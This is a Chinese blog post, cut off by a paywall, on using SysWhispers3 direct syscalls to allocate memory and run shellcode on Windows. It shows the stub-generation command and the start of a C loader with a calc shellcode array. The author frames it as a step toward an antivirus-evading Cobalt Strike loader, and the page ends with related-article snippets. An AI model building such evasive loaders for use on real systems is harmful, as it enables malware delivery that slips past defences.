syscall函数（调用底层，非windowsAPI）去执行shellcode

利用SysWhispers3进行Windows系统调用：动态payload与杀毒检测

原创

已于 2023-08-30 00:59:09 修改 · 696 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#windows #c++ #网络安全

于 2023-08-30 00:58:51 首次发布

文章介绍了如何使用SysWhispers3库在Windows系统中执行NtCreateThreadEx和NtProtectVirtualMemory等函数，创建一个弹出计算器的payload。然而，由于syscall的静态特征容易被杀毒软件如360识别，导致payload被标记为病毒。

首先使用github提供的项目https://github.com/klezVirus/SysWhispers3
利用该工具去执行命令

python3 syswhispers.py --functions NtCreateThreadEx,NtProtectVirtualMemory,NtAllocateVirtualMemory -o syscalls_mem --arch x64 --wow64

然后会产生三个文件
在这里插入图片描述
然后我们将它放到vs studio中，如下：

我们分开来看
ConsoleApplication3.c：（该payload是弹出计算器，还需要后续去改成上线cs）

#define _CRT_SECURE_NO_WARNINGS 1
#include "syscalls_mem.h"
#include <Windows.h>
#include<stdio.h>

unsigned char calc_payload[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"</

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

番茄酱料

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

windows 平台shellcode编写

fanghuapyk的博客

05-21

1122

0x00、介绍比方说你手头上有一个IE或FlashPlayer现成的漏洞利用代码，但它只能够打开计算器calc.exe。但是这实际上并没有什么卵用，不是吗?你真正想要的是可以执行一些远程命令或实现其他有用的功能。在这种情况下，你可能想要利用已有的标准shellcode，比如来自Shell Storm数据库或由Metasploit的msfvenom工具生成。不过，你必须先理解编写shellcode的基本原则，才可以在自己的漏洞利用代码中有效地使用它们。对于不熟悉这个术语的同学们，可以参考一下维基百科：在

SyscallPOC:使用syscall的Shellcode注入POC

03-09

系统调用使用syscall的概念shellcode注入器的简单证明。当前适用于Windows 10 1909和2004，默认值为1909。您需要在Syscalls.cs取消注释2004年的syscall，并注释掉1909年的syscall才能切换到2004年。该POC的灵感来自Jack Halon及其中的SysSys调用以及badBounty的。多亏了两者！

参与评论您还未登录，请先登录后发表或查看评论

Syscall系统调用Linux内核跟踪

weixin_33802505的博客

04-11

221

在Linux的用户空间，我们经常会调用系统调用，下面我们跟踪一下read系统调用，使用的Linux内核版本为Linux2.6.37。不同的Linux版本其中的实现略有不同。在一些应用中我们可以看到下面的一些定义： #define real_read(fd, buf, count ) (syscall(SYS_read, (fd), (buf), (count))) ...

syscall()

m0_51551385的博客

06-03

4115

syscall函数

syscall是什么

斯坦福-MIT-Harvard-CMU

11-06

1662

系统调用（Syscall）是操作系统提供给应用程序的编程接口，允许应用程序与操作系统内核进行交互，以访问操作系统提供的服务和资源。系统调用是操作系统内核的一部分，通过系统调用，应用程序可以执行一些特权操作，例如文件访问、进程管理、网络通信等。在RISC-V体系结构中，系统调用通常以ecall指令的形式出现，作为从用户态进入内核态的一种方式。ecall指令用于触发异常，操作系统内核会在异常处理程序中执行相应的系统调用服务。

尚硅谷2020最新版宋红康JVM教程-中篇-第2章Class文件结构-1-概述

admin741admin的博客

09-28

451

引言 Java字节码对于虚拟机，就好像汇编语言对于计算机，属于基本执行指令。 Java虚拟机的指令由一个字节长度的、代表着某种特定操作含义的数字（称为操作码，Opcode）以及跟随其后的零至多个代表此操作所需参数（称为操作数，Operands）而构成。由于Java虚拟机采用面向操作数栈而不是寄存器的结构，所以大多数的指令都不包含操作数，只有一个操作码。由于限制了Java虚拟机操作码的长度为一个字节（即0~255），这意味着指令集的操作码总数不可能超过256条。官方文档：https://docs.ora

揭秘函数调用栈底层原理：深入理解程序执行流程与内存布局

揭秘函数调用栈底层原理：深入理解程序执行流程与内存布局程序执行的本质是函数间的调用协作，而函数调用栈（Call Stack）正是支撑这一机制的核心数据结构。它不仅记录了函数调用的顺序，还保存了每个函数运行时...

go-shellcode - Go语言编写的ShellCode执行工具.zip

07-18

它利用Go的系统调用接口，如`mmap`和`syscall`，在内存中创建一个新的可执行区域，将ShellCode复制到这个区域，然后设置必要的寄存器值并触发执行。这种设计使得ShellCode的加载和执行过程更为灵活和可控。在使用`...

深入理解Windows Shellcode技术

- **寻找kernel32.dll**：kernel32.dll是Windows API的关键部分，许多Shellcode需要找到它的地址来调用其函数。文档介绍了如何利用PEB（Process Environment Block）结构和SEH（Structured Exception Handling）来...

linux syscall

Am_111的专栏

05-24

3868

linux syscall

syscall实现

06-20

linux c syscall 简单实现

x64-syscall:C ++中的x64 syscall调用程序

05-11

x64系统调用 C ++中的x64 syscall调用程序。使用示例（来自Windows 10的索引，内部版本1803）： ObjectAttributes.Length = sizeof ( OBJECT_ATTRIBUTES ); ClientId.UniqueProcess = HANDLE( 1000 ); // PID // NtOpenProcess Syscall ( 0x26 , & Handle , PROCESS_TERMINATE, &ObjectAttributes, &ClientId ); // NtTerminateProcess Syscall ( 0x2C , Handle ); // NtQuerySystemInformation const auto Status = Syscall< NTSTATUS>( 0x36 , SystemProc

Windows-Syscalls-Examples:在各种Windows版本和体系结构中如何使用Syscall的示例

05-09

Windows系统调用在各种Windows版本和体系结构中如何使用Syscall的示例。

Node.js-Windows系统调用(syscall)表从xp~10rs2

08-10

Windows系统调用(syscall)表从xp ~ 10 rs2

Linux - 系统调用（syscall）

qazw9600的专栏

11-25

2427

syscall 原理

【pwnable.kr】 syscall

子曰小玖的博客

06-10

773

1. Challenge I made a new system call for Linux kernel. It converts lowercase letters to upper case letters. would you like to see the implementation? Download : http://pwnable.kr/bin/syscall.c ...

linux 系统调用